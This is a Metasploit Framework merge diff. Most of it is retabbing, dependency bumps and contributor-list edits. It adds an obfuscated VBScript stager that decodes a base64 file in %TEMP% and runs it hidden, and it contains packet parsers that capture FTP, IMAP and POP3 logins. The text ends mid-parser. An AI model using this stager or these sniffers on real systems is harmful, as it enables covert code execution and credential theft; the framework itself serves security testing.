Land #2511 , fix up NoMethodError and hanging connx

Ensure TCP connection is closed
Land #2522 , @todb-r7's pre-release module fixes
2013-10-14 16:30:19 -05:00 · 2013-10-14 21:53:22 +01:00 · 2013-10-14 15:37:23 -05:00 · 2013-10-14 15:17:39 -05:00 · 2013-10-14 15:15:47 -05:00 · 2013-10-14 14:10:08 -05:00
3630 changed files with 534152 additions and 512275 deletions
@@ -1,10 +1,9 @@
 .bundle
 # Rubymine project directory
 .idea
-# Portable ruby version files for rvm
-.ruby-gemset
-.ruby-version
-# RVM control file
+# Sublime Text project directory (not created by ST by default)
+.sublime-project
+# RVM control file, keep this to avoid backdooring Metasploit
 .rvmrc
 # YARD cache directory
 .yardoc
@@ -14,7 +13,7 @@
 config/database.yml
 # simplecov coverage data
 coverage
-data/meterpreter/ext_server_pivot.dll
+data/meterpreter/ext_server_pivot.x86.dll
 data/meterpreter/ext_server_pivot.x64.dll
 doc/
 external/source/meterpreter/java/bin
@@ -40,3 +39,5 @@ tags
 *.orig
 *.rej
 *~
+# Ignore backups of retabbed files
+*.notab
@@ -1,14 +1,13 @@
-bperry-r7 <bperry-r7@github>       Brandon Perry <bperry.volatile@gmail.com>
-bperry-r7 <bperry-r7@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
 bturner-r7 <bturner-r7@github>     Brandon Turner <brandon_turner@rapid7.com>
-dmaloney-r7 <dmaloney-r7@github>   David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
 dmaloney-r7 <dmaloney-r7@github>   David Maloney <David_Maloney@rapid7.com>
+dmaloney-r7 <dmaloney-r7@github>   David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
 ecarey-r7 <ecarey-r7@github>       Erran Carey <e@ipwnstuff.com>
 hmoore-r7 <hmoore-r7@github>       HD Moore <hd_moore@rapid7.com>
 hmoore-r7 <hmoore-r7@github>       HD Moore <hdm@digitaloffense.net>
-jlee-r7 <jlee-r7@github>           James Lee <James_Lee@rapid7.com>
-jlee-r7 <jlee-r7@github>           James Lee <egypt@metasploit.com> # aka egypt
 jlee-r7 <jlee-r7@github>           egypt <egypt@metasploit.com> # aka egypt
+jlee-r7 <jlee-r7@github>           James Lee <egypt@metasploit.com> # aka egypt
+jlee-r7 <jlee-r7@github>           James Lee <James_Lee@rapid7.com>
+joev-r7 <joev-r7@github>           joev <joev@metasploit.com>
 joev-r7 <joev-r7@github>           Joe Vennix <Joe_Vennix@rapid7.com>
 jvazquez-r7 <jvazquez-r7@github>   jvazquez-r7 <juan.vazquez@metasploit.com>
 limhoff-r7 <limhoff-r7@github>     Luke Imhoff <luke_imhoff@rapid7.com>
@@ -16,35 +15,39 @@ shuckins-r7 <shuckins-r7@github>   Samuel Huckins <samuel_huckins@rapid7.com>
 tasos-r7 <tasos-r7@github>         Tasos Laskos <Tasos_Laskos@rapid7.com>
 todb-r7 <todb-r7@github>           Tod Beardsley <tod_beardsley@rapid7.com>
 todb-r7 <todb-r7@github>           Tod Beardsley <todb@metasploit.com>
-wchen-r7 <wchen-r7@github>         Wei Chen <Wei_Chen@rapid7.com>
 wchen-r7 <wchen-r7@github>         sinn3r <msfsinn3r@gmail.com> # aka sinn3r
 wchen-r7 <wchen-r7@github>         sinn3r <wei_chen@rapid7.com>
+wchen-r7 <wchen-r7@github>         Wei Chen <Wei_Chen@rapid7.com>
+wvu-r7 <wvu-r7@github>             William Vu <William_Vu@rapid7.com>
+wvu-r7 <wvu-r7@github>             William Vu <wvu@nmt.edu>

-# Above this line are current Rapid7 employees Below this paragraph are
+# Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
 # one time or another, had some largeish number of commits landed on
 # rapid7/metasploit-framework master branch.  This should be refreshed
 # periodically. If you're on this list and would like to not be, just
 # let todb@metasploit.com know.

+bannedit <bannedit@github>             David Rude <bannedit0@gmail.com>
+Brandon Perry <brandonprry@github>     Brandon Perry <bperry.volatile@gmail.com>
+Brandon Perry <brandonprry@github>     Brandon Perry <bperry@bperry-rapid7.(none)>
 Brian Wallace <bwall@github>           (B)rian (Wall)ace <nightstrike9809@gmail.com>
 Brian Wallace <bwall@github>           Brian Wallace <bwall@openbwall.com>
+ceballosm <ceballosm@github>           Mario Ceballos <mc@metasploit.com>
+Chao-mu <Chao-Mu@github>               Chao Mu <chao.mu@minorcrash.com>
+Chao-mu <Chao-Mu@github>               chao-mu <chao.mu@minorcrash.com>
+Chao-mu <Chao-Mu@github>               chao-mu <chao@confusion.(none)>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
-FireFart <FireFart@github>             Christian Mehlmauer <firefart@gmail.com>
-Meatballs1 <Meatballs1@github>         Ben Campbell <eat_meatballs@hotmail.co.uk>
-Meatballs1 <Meatballs1@github>         Meatballs <eat_meatballs@hotmail.co.uk>
-Meatballs1 <Meatballs1@github>         Meatballs1 <eat_meatballs@hotmail.co.uk> 
-bannedit <bannedit@github>             David Rude <bannedit0@gmail.com>
-ceballosm <ceballosm@github>           Mario Ceballos <mc@metasploit.com>
-corelanc0d3er <corelanc0d3er@github>   Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
 corelanc0d3er <corelanc0d3er@github>   corelanc0d3r <peter.ve@corelan.be>
+corelanc0d3er <corelanc0d3er@github>   Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
 darkoperator <darkoperator@github>     Carlos Perez <carlos_perez@darkoperator.com>
 efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>
 fab <fab@???>                          fab <> # fab at revhosts.net (Fabrice MOURRON)
-h0ng10 <h0ng10@github>                 Hans-Martin Münch <hansmartin.muench@googlemail.com>
+FireFart <FireFart@github>             Christian Mehlmauer <firefart@gmail.com>
 h0ng10 <h0ng10@github>                 h0ng10 <hansmartin.muench@googlemail.com>
+h0ng10 <h0ng10@github>                 Hans-Martin Münch <hansmartin.muench@googlemail.com>
 jcran <jcran@github>                   Jonathan Cran <jcran@0x0e.org>
 jcran <jcran@github>                   Jonathan Cran <jcran@rapid7.com>
 jduck <jduck@github>                   Joshua Drake <github.jdrake@qoop.org>
@@ -56,6 +59,9 @@ kris <kris@???>                        kris <>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <github@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <m1k3@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <michael.messner@integralis.com>
+Meatballs1 <Meatballs1@github>         Ben Campbell <eat_meatballs@hotmail.co.uk>
+Meatballs1 <Meatballs1@github>         Meatballs <eat_meatballs@hotmail.co.uk>
+Meatballs1 <Meatballs1@github>         Meatballs1 <eat_meatballs@hotmail.co.uk> 
 mubix <mubix@github>                   Rob Fuller <jd.mubix@gmail.com>
 nevdull77 <nevdull77@github>           Patrik Karlsson <patrik@cqure.net>
 nmonkee <nmonkee@github>               nmonkee <dave@northern-monkee.co.uk> 
@@ -0,0 +1 @@
+metasploit-framework
@@ -0,0 +1 @@
+1.9.3-p448
@@ -15,4 +15,4 @@ notifications:
  irc: "irc.freenode.org#msfnotify"

 git:
-  depth: 1
+  depth: 5
@@ -1,4 +1,4 @@
-source 'http://rubygems.org'
+source 'https://rubygems.org'

 # Need 3+ for ActiveSupport::Concern
 gem 'activesupport', '>= 3.0.0'
@@ -11,13 +11,13 @@ gem 'nokogiri'
 # Needed by anemone crawler
 gem 'robots'
 # Needed by db.rb and Msf::Exploit::Capture
-gem 'packetfu', '1.1.8'
+gem 'packetfu', '1.1.9'

 group :db do
 	# Needed for Msf::DbManager
 	gem 'activerecord'
 	# Database models shared between framework and Pro.
-	gem 'metasploit_data_models', '~> 0.16.1'
+	gem 'metasploit_data_models', '~> 0.16.6'
 	# Needed for module caching in Mdm::ModuleDetails
 	gem 'pg', '>= 0.11'
 end
@@ -41,7 +41,7 @@ group :development, :test do
 	# 'FactoryGirl.' in factory definitions syntax.
 	gem 'factory_girl', '>= 4.1.0'
 	# running documentation generation tasks and rspec tasks
-	gem 'rake'
+	gem 'rake', '>= 10.0.0'
 end

 group :test do
@@ -51,11 +51,10 @@ group :test do
 	gem 'database_cleaner'
 	# testing framework
 	gem 'rspec', '>= 2.12'
-	# add matchers from shoulda, such as query_the_database, which is useful for
-	# testing that the Msf::DBManager activation is respected.
 	gem 'shoulda-matchers'
 	# code coverage for tests
 	# any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
+	# see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
 	gem 'simplecov', '0.5.4', :require => false
 	# Manipulate Time.now in specs
 	gem 'timecop'
@@ -1,62 +1,58 @@
 GEM
-  remote: http://rubygems.org/
+  remote: https://rubygems.org/
  specs:
-    activemodel (3.2.13)
-      activesupport (= 3.2.13)
+    activemodel (3.2.14)
+      activesupport (= 3.2.14)
      builder (~> 3.0.0)
-    activerecord (3.2.13)
-      activemodel (= 3.2.13)
-      activesupport (= 3.2.13)
+    activerecord (3.2.14)
+      activemodel (= 3.2.14)
+      activesupport (= 3.2.14)
      arel (~> 3.0.2)
      tzinfo (~> 0.3.29)
-    activesupport (3.2.13)
-      i18n (= 0.6.1)
+    activesupport (3.2.14)
+      i18n (~> 0.6, >= 0.6.4)
      multi_json (~> 1.0)
    arel (3.0.2)
-    bourne (1.4.0)
-      mocha (~> 0.13.2)
    builder (3.0.4)
-    database_cleaner (0.9.1)
-    diff-lcs (1.2.2)
+    database_cleaner (1.1.1)
+    diff-lcs (1.2.4)
    factory_girl (4.2.0)
      activesupport (>= 3.0.0)
-    i18n (0.6.1)
-    json (1.7.7)
-    metaclass (0.0.1)
-    metasploit_data_models (0.16.1)
+    i18n (0.6.5)
+    json (1.8.0)
+    metasploit_data_models (0.16.6)
      activerecord (>= 3.2.13)
      activesupport
      pg
-    mocha (0.13.3)
-      metaclass (~> 0.0.1)
-    msgpack (0.5.4)
+    mini_portile (0.5.1)
+    msgpack (0.5.5)
    multi_json (1.0.4)
    network_interface (0.0.1)
-    nokogiri (1.5.9)
-    packetfu (1.1.8)
+    nokogiri (1.6.0)
+      mini_portile (~> 0.5.0)
+    packetfu (1.1.9)
    pcaprub (0.11.3)
-    pg (0.15.1)
-    rake (10.0.4)
-    redcarpet (2.2.2)
+    pg (0.16.0)
+    rake (10.1.0)
+    redcarpet (3.0.0)
    robots (0.10.1)
-    rspec (2.13.0)
-      rspec-core (~> 2.13.0)
-      rspec-expectations (~> 2.13.0)
-      rspec-mocks (~> 2.13.0)
-    rspec-core (2.13.1)
-    rspec-expectations (2.13.0)
+    rspec (2.14.1)
+      rspec-core (~> 2.14.0)
+      rspec-expectations (~> 2.14.0)
+      rspec-mocks (~> 2.14.0)
+    rspec-core (2.14.5)
+    rspec-expectations (2.14.2)
      diff-lcs (>= 1.1.3, < 2.0)
-    rspec-mocks (2.13.0)
-    shoulda-matchers (1.5.2)
+    rspec-mocks (2.14.3)
+    shoulda-matchers (2.3.0)
      activesupport (>= 3.0.0)
-      bourne (~> 1.3)
    simplecov (0.5.4)
      multi_json (~> 1.0.3)
      simplecov-html (~> 0.5.3)
    simplecov-html (0.5.3)
-    timecop (0.6.1)
+    timecop (0.6.3)
    tzinfo (0.3.37)
-    yard (0.8.5.2)
+    yard (0.8.7)

 PLATFORMS
  ruby
@@ -67,14 +63,14 @@ DEPENDENCIES
  database_cleaner
  factory_girl (>= 4.1.0)
  json
-  metasploit_data_models (~> 0.16.1)
+  metasploit_data_models (~> 0.16.6)
  msgpack
  network_interface (~> 0.0.1)
  nokogiri
-  packetfu (= 1.1.8)
+  packetfu (= 1.1.9)
  pcaprub
  pg (>= 0.11)
-  rake
+  rake (>= 10.0.0)
  redcarpet
  robots
  rspec (>= 2.12)
@@ -9,8 +9,8 @@ Code Style
 In order to maintain consistency and readability, we ask that you
 adhere to the following style guidelines:

- - Hard tabs, not spaces
- - Try to keep your lines under 100 columns (assuming four-space tabs)
+ - Standard Ruby two-space soft tabs, not hard tabs.
+ - Try to keep your lines under 100 columns (assuming two-space tabs)
 - do; end instead of {} for a block
 - Always use str[0,1] instead of str[0]
   (This avoids a known ruby 1.8/1.9 incompatibility.)
@@ -15,8 +15,8 @@ require 'open-uri'
 require 'timeout'

 def usage
-	$stderr.puts "#{$0} [site list] [output-dir]"
-	exit(0)
+  $stderr.puts "#{$0} [site list] [output-dir]"
+  exit(0)
 end

 input = ARGV.shift() || usage()
@@ -25,32 +25,32 @@ res = ""
 doc = Hpricot(File.open(input))
 doc.search("//form").each do |form|

-	# Extract the form
-	res = "<form"
-	form.attributes.each do |attr|
-		res << " #{attr[0]}='#{attr[1].gsub("'", "")}'"
-	end
-	res << "> "
+  # Extract the form
+  res = "<form"
+  form.attributes.each do |attr|
+    res << " #{attr[0]}='#{attr[1].gsub("'", "")}'"
+  end
+  res << "> "

-	# Strip out the value
-	form.search("//input") do |inp|
+  # Strip out the value
+  form.search("//input") do |inp|

-		inp.attributes.keys.each do |ikey|
-			if (ikey.downcase == "value")
-				inp[ikey] = ""
-				next
-			end
+    inp.attributes.keys.each do |ikey|
+      if (ikey.downcase == "value")
+        inp[ikey] = ""
+        next
+      end

-			if(inp.attributes[ikey] =~ /^http/i)
-				inp[ikey] = ""
-				next
-			end
+      if(inp.attributes[ikey] =~ /^http/i)
+        inp[ikey] = ""
+        next
+      end

-		end
+    end

-		res << inp.to_html
-	end
-	res << "</form>"
+    res << inp.to_html
+  end
+  res << "</form>"
 end

 $stdout.puts res
@@ -15,72 +15,72 @@ require 'open-uri'
 require 'timeout'

 def usage
-	$stderr.puts "#{$0} [site list] [output-dir]"
-	exit(0)
+  $stderr.puts "#{$0} [site list] [output-dir]"
+  exit(0)
 end

 sitelist = ARGV.shift() || usage()
 output   = ARGV.shift() || usage()

 File.readlines(sitelist).each do |site|
-	site.strip!
-	next if site.length == 0
-	next if site =~ /^#/
-	
-	out = File.join(output, site + ".txt")
-	File.unlink(out) if File.exists?(out)
-	
-	fd  = File.open(out, "a")
-	
+  site.strip!
+  next if site.length == 0
+  next if site =~ /^#/
+  
+  out = File.join(output, site + ".txt")
+  File.unlink(out) if File.exists?(out)
+  
+  fd  = File.open(out, "a")
+  

-	["", "www."].each do |prefix|
-		begin
-			Timeout.timeout(10) do 
-				doc = Hpricot(open("http://#{prefix}#{site}/"))
-				doc.search("//form").each do |form|
+  ["", "www."].each do |prefix|
+    begin
+      Timeout.timeout(10) do 
+        doc = Hpricot(open("http://#{prefix}#{site}/"))
+        doc.search("//form").each do |form|

-					# Extract the form
-					res = "<form"
-					form.attributes.each do |attr|
-						res << " #{attr[0]}='#{attr[1].gsub("'", "")}'"
-					end
-					res << "> "
+          # Extract the form
+          res = "<form"
+          form.attributes.each do |attr|
+            res << " #{attr[0]}='#{attr[1].gsub("'", "")}'"
+          end
+          res << "> "

-					# Strip out the value
-					form.search("//input") do |inp|
+          # Strip out the value
+          form.search("//input") do |inp|

-						inp.attributes.keys.each do |ikey|
-							if (ikey.downcase == "value")
-								inp[ikey] = ""
-								next
-							end
+            inp.attributes.keys.each do |ikey|
+              if (ikey.downcase == "value")
+                inp[ikey] = ""
+                next
+              end

-							if(inp.attributes[ikey] =~ /^http/i)
-								inp[ikey] = ""
-								next
-							end
+              if(inp.attributes[ikey] =~ /^http/i)
+                inp[ikey] = ""
+                next
+              end

-						end
+            end

-						res << inp.to_html
-					end
-					res << "</form>"
+            res << inp.to_html
+          end
+          res << "</form>"

-					fd.write(res)
-				end
-			end
-			break
-		rescue ::Timeout::Error
-			$stderr.puts "#{prefix}#{site} timed out"
-		rescue ::Interrupt
-			raise $!
-		rescue ::Exception => e
-			$stderr.puts "#{prefix}#{site} #{e.class} #{e}"
-		end
-	end
-	
-	fd.close
-	
-	File.unlink(out) if (File.size(out) == 0)
+          fd.write(res)
+        end
+      end
+      break
+    rescue ::Timeout::Error
+      $stderr.puts "#{prefix}#{site} timed out"
+    rescue ::Interrupt
+      raise $!
+    rescue ::Exception => e
+      $stderr.puts "#{prefix}#{site} #{e.class} #{e}"
+    end
+  end
+  
+  fd.close
+  
+  File.unlink(out) if (File.size(out) == 0)

 end
@@ -0,0 +1,49 @@
+echo Dim encodedFile, decodedFile, scriptingFS, scriptShell, emptyString, tempString, Base64Chars, tempDir >>decode_stub
+echo encodedFile = Chr(92)+CHRENCFILE >>decode_stub
+echo decodedFile = Chr(92)+CHRDECFILE >>decode_stub
+echo scriptingFS = Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(79)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116) >>decode_stub
+echo scriptShell = Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(83)+Chr(104)+Chr(101)+Chr(108)+Chr(108) >>decode_stub
+echo emptyString = Chr(84)+Chr(104)+Chr(101)+Chr(32)+Chr(102)+Chr(105)+Chr(108)+Chr(101)+Chr(32)+Chr(105)+Chr(115)+Chr(32)+Chr(101)+Chr(109)+Chr(112)+Chr(116)+Chr(121)+Chr(46)>>decode_stub
+echo tempString  = Chr(37)+Chr(84)+Chr(69)+Chr(77)+Chr(80)+Chr(37) >>decode_stub
+echo Base64Chars = Chr(65)+Chr(66)+Chr(67)+Chr(68)+Chr(69)+Chr(70)+Chr(71)+Chr(72)+Chr(73)+Chr(74)+Chr(75)+Chr(76)+Chr(77)+Chr(78)+Chr(79)+Chr(80)+Chr(81)+Chr(82)+Chr(83)+Chr(84)+Chr(85)+Chr(86)+Chr(87)+Chr(88)+Chr(89)+Chr(90)+Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+Chr(103)+Chr(104)+Chr(105)+Chr(106)+Chr(107)+Chr(108)+Chr(109)+Chr(110)+Chr(111)+Chr(112)+Chr(113)+Chr(114)+Chr(115)+Chr(116)+Chr(117)+Chr(118)+Chr(119)+Chr(120)+Chr(121)+Chr(122)+Chr(48)+Chr(49)+Chr(50)+Chr(51)+Chr(52)+Chr(53)+Chr(54)+Chr(55)+Chr(56)+Chr(57)+Chr(43)+Chr(47) >>decode_stub
+echo Set wshShell = CreateObject(scriptShell) >>decode_stub
+echo tempDir = wshShell.ExpandEnvironmentStrings(tempString) >>decode_stub
+echo Set fs = CreateObject(scriptingFS) >>decode_stub
+echo Set file = fs.GetFile(tempDir+encodedFile) >>decode_stub
+echo If file.Size Then >>decode_stub
+echo Set fd = fs.OpenTextFile(tempDir+encodedFile, 1) >>decode_stub
+echo data = fd.ReadAll >>decode_stub
+echo data = Replace(data, Chr(32)+vbCrLf, nil) >>decode_stub
+echo data = Replace(data, vbCrLf, nil) >>decode_stub
+echo data = base64_decode(data) >>decode_stub
+echo fd.Close >>decode_stub
+echo Set ofs = CreateObject(scriptingFS).OpenTextFile(tempDir+decodedFile, 2, True) >>decode_stub
+echo ofs.Write data >>decode_stub
+echo ofs.close >>decode_stub
+echo wshShell.run tempDir+decodedFile, 0, false >>decode_stub
+echo Else >>decode_stub
+echo Wscript.Echo emptyString >>decode_stub
+echo End If >>decode_stub
+echo Function base64_decode(byVal strIn) >>decode_stub
+echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
+echo For n = 1 To Len(strIn) Step 4 >>decode_stub
+echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
+echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
+echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
+echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
+echo If Not w2 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
+echo If  Not w3 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
+echo If Not w4 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
+echo Next >>decode_stub
+echo base64_decode = strOut >>decode_stub
+echo End Function >>decode_stub
+echo Function mimedecode(byVal strIn) >>decode_stub
+echo If Len(strIn) = 0 Then >>decode_stub
+echo mimedecode = -1 : Exit Function >>decode_stub
+echo Else >>decode_stub
+echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
+echo End If >>decode_stub
+echo End Function >>decode_stub
@@ -8,71 +8,71 @@

 class SnifferFTP < BaseProtocolParser

-	def register_sigs
-		self.sigs = {
-			:banner		=> /^(220\s*[^\r\n]+)/i,
-			:user		=> /^USER\s+([^\s]+)/i,
-			:pass		=> /^PASS\s+([^\s]+)/i,
-			:login_pass => /^(230\s*[^\n]+)/i,
-			:login_fail => /^(5\d\d\s*[^\n]+)/i,
-			:bye      => /^221/
-		}
-	end
+  def register_sigs
+    self.sigs = {
+      :banner		=> /^(220\s*[^\r\n]+)/i,
+      :user		=> /^USER\s+([^\s]+)/i,
+      :pass		=> /^PASS\s+([^\s]+)/i,
+      :login_pass => /^(230\s*[^\n]+)/i,
+      :login_fail => /^(5\d\d\s*[^\n]+)/i,
+      :bye      => /^221/
+    }
+  end

-	def parse(pkt)
-		# We want to return immediatly if we do not have a packet which is handled by us
-		return unless pkt.is_tcp?
-		return if (pkt.tcp_sport != 21 and pkt.tcp_dport != 21)
-		s = find_session((pkt.tcp_sport == 21) ? get_session_src(pkt) : get_session_dst(pkt))
-		s[:sname] ||= "ftp"
+  def parse(pkt)
+    # We want to return immediatly if we do not have a packet which is handled by us
+    return unless pkt.is_tcp?
+    return if (pkt.tcp_sport != 21 and pkt.tcp_dport != 21)
+    s = find_session((pkt.tcp_sport == 21) ? get_session_src(pkt) : get_session_dst(pkt))
+    s[:sname] ||= "ftp"

-		self.sigs.each_key do |k|
-			# There is only one pattern per run to test
-			matched = nil
-			matches = nil
+    self.sigs.each_key do |k|
+      # There is only one pattern per run to test
+      matched = nil
+      matches = nil

-			if(pkt.payload =~ self.sigs[k])
-				matched = k
-				matches = $1
-			end
+      if(pkt.payload =~ self.sigs[k])
+        matched = k
+        matches = $1
+      end

-			case matched
+      case matched

-			when :login_fail
-				if(s[:user] and s[:pass])
-					report_auth_info(s.merge({:active => false}))
-					print_status("Failed FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
+      when :login_fail
+        if(s[:user] and s[:pass])
+          report_auth_info(s.merge({:active => false}))
+          print_status("Failed FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")

-					s[:pass] = ""
-					return
-				end
+          s[:pass] = ""
+          return
+        end

-			when :login_pass
-				if(s[:user] and s[:pass])
-					report_auth_info(s)
-					print_status("Successful FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
-					# Remove it form the session objects so freeup memory
-					sessions.delete(s[:session])
-					return
-				end
+      when :login_pass
+        if(s[:user] and s[:pass])
+          report_auth_info(s)
+          print_status("Successful FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
+          # Remove it form the session objects so freeup memory
+          sessions.delete(s[:session])
+          return
+        end

-			when :banner
-				# Because some ftp server send multiple banner we take only the first one and ignore the rest
-				if not (s[:info])
-					s[:info] = matches
-					report_service(s)
-				end
+      when :banner
+        # Because some ftp server send multiple banner we take only the first one and ignore the rest
+        if not (s[:info])
+          s[:info] = matches
+          report_service(s)
+        end

-			when :bye
-				sessions.delete(s[:session])
+      when :bye
+        sessions.delete(s[:session])

-			when nil
-				# No matches, no saved state
-			else
-				sessions[s[:session]].merge!({k => matches})
-			end # end case matched
+      when nil
+        # No matches, no saved state
+      else
+        sessions[s[:session]].merge!({k => matches})
+      end # end case matched

-		end # end of each_key
-	end # end of parse
+    end # end of each_key
+  end # end of parse
 end

@@ -9,72 +9,72 @@

 class SnifferIMAP < BaseProtocolParser

-	def register_sigs
-		self.sigs = {
-			:banner		=> /^(\*\s+OK[^\n\r]*)/i,
-			:login		=> /^CAPABILITY\s+LOGIN\s+([^\s]+)\s+([^\n\r]+)/i,
-			:login_pass => /^CAPABILITY\s+OK\s+(Login[^\n\r]*)/i,
-			:login_bad	=> /^CAPABILITY\s+BAD\s+(Login[^\n\r]*)/i,
-			:login_fail => /^CAPABILITY\s+NO\s+(Login[^\n\r]*)/i
-		}
-	end
+  def register_sigs
+    self.sigs = {
+      :banner		=> /^(\*\s+OK[^\n\r]*)/i,
+      :login		=> /^CAPABILITY\s+LOGIN\s+([^\s]+)\s+([^\n\r]+)/i,
+      :login_pass => /^CAPABILITY\s+OK\s+(Login[^\n\r]*)/i,
+      :login_bad	=> /^CAPABILITY\s+BAD\s+(Login[^\n\r]*)/i,
+      :login_fail => /^CAPABILITY\s+NO\s+(Login[^\n\r]*)/i
+    }
+  end

-	def parse(pkt)
+  def parse(pkt)

-		# We want to return immediatly if we do not have a packet which is handled by us
-		return unless pkt.is_tcp?
-		return if (pkt.tcp_sport != 143 and pkt.tcp_dport != 143)
-		s = find_session((pkt.tcp_sport == 143) ? get_session_src(pkt) : get_session_dst(pkt))
-		s[:sname] ||= "imap4"
+    # We want to return immediatly if we do not have a packet which is handled by us
+    return unless pkt.is_tcp?
+    return if (pkt.tcp_sport != 143 and pkt.tcp_dport != 143)
+    s = find_session((pkt.tcp_sport == 143) ? get_session_src(pkt) : get_session_dst(pkt))
+    s[:sname] ||= "imap4"

-		self.sigs.each_key do |k|
-			# There is only one pattern per run to test
-			matched = nil
-			matches = nil
+    self.sigs.each_key do |k|
+      # There is only one pattern per run to test
+      matched = nil
+      matches = nil

-			if (pkt.payload =~ self.sigs[k])
-				matched = k
-				matches = [$1,$2]
-			end
+      if (pkt.payload =~ self.sigs[k])
+        matched = k
+        matches = [$1,$2]
+      end

-			case matched
-			when :banner
-				s[:info] = matches
-				report_service(s)
+      case matched
+      when :banner
+        s[:info] = matches
+        report_service(s)

-			when :login_pass
+      when :login_pass

-				report_auth_info(s)
-				print_status("Successful IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
+        report_auth_info(s)
+        print_status("Successful IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")

-				# Remove it form the session objects so freeup
-				sessions.delete(s[:session])
+        # Remove it form the session objects so freeup
+        sessions.delete(s[:session])

-			when :login_fail
+      when :login_fail

-				report_auth_info(s.merge({:active => false}))
-				print_status("Failed IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
+        report_auth_info(s.merge({:active => false}))
+        print_status("Failed IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")

-				# Remove it form the session objects so freeup
-				sessions.delete(s[:session])
+        # Remove it form the session objects so freeup
+        sessions.delete(s[:session])

-			when :login_bad
-				report_auth_info(s.merge({:active => false}))
-				print_status("Bad IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
+      when :login_bad
+        report_auth_info(s.merge({:active => false}))
+        print_status("Bad IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")

-				# Remove it form the session objects so freeup
-				sessions.delete(s[:session])
+        # Remove it form the session objects so freeup
+        sessions.delete(s[:session])

-			when :login
-				s[:user]=$1
-				s[:pass]=$2
+      when :login
+        s[:user]=$1
+        s[:pass]=$2

-			when nil
-				# No matches, no saved state
-			else
-				sessions[s[:session]].merge!({k => matches})
-			end # end case matched
-		end # end of each_key
-	end # end of parse
+      when nil
+        # No matches, no saved state
+      else
+        sessions[s[:session]].merge!({k => matches})
+      end # end case matched
+    end # end of each_key
+  end # end of parse
 end

@@ -6,83 +6,83 @@
 # as unsuccessful logins... (Typos are common :-) )
 #
 class SnifferPOP3 < BaseProtocolParser
-	def register_sigs
-		self.sigs = {
-			:ok				=> /^(\+OK[^\n]*)\n/i,
-			:err			=> /^(\-ERR[^\n]*)\n/i,
-			:user			=> /^USER\s+([^\n]+)\n/i,
-			:pass			=> /^PASS\s+([^\n]+)\n/i,
-			:quit			=> /^(QUIT\s*[^\n]*)\n/i
-		}
-	end
+  def register_sigs
+    self.sigs = {
+      :ok				=> /^(\+OK[^\n]*)\n/i,
+      :err			=> /^(\-ERR[^\n]*)\n/i,
+      :user			=> /^USER\s+([^\n]+)\n/i,
+      :pass			=> /^PASS\s+([^\n]+)\n/i,
+      :quit			=> /^(QUIT\s*[^\n]*)\n/i
+    }
+  end

-	def parse(pkt)
-		# We want to return immediatly if we do not have a packet which is handled by us
-		return unless pkt.is_tcp?
-		return if (pkt.tcp_sport != 110 and pkt.tcp_dport != 110)
-		s = find_session((pkt.tcp_sport == 110) ? get_session_src(pkt) : get_session_dst(pkt))
+  def parse(pkt)
+    # We want to return immediatly if we do not have a packet which is handled by us
+    return unless pkt.is_tcp?
+    return if (pkt.tcp_sport != 110 and pkt.tcp_dport != 110)
+    s = find_session((pkt.tcp_sport == 110) ? get_session_src(pkt) : get_session_dst(pkt))

-		self.sigs.each_key do |k|
-			# There is only one pattern per run to test
-			matched = nil
-			matches = nil
+    self.sigs.each_key do |k|
+      # There is only one pattern per run to test
+      matched = nil
+      matches = nil

-			if(pkt.payload =~ self.sigs[k])
-				matched = k
-				matches = $1
-			end
+      if(pkt.payload =~ self.sigs[k])
+        matched = k
+        matches = $1
+      end

-			case matched
-				when :ok
-					# Last command was successful, in addition most servers transmit a banner with the first +OK
-					case s[:last]
-						when nil
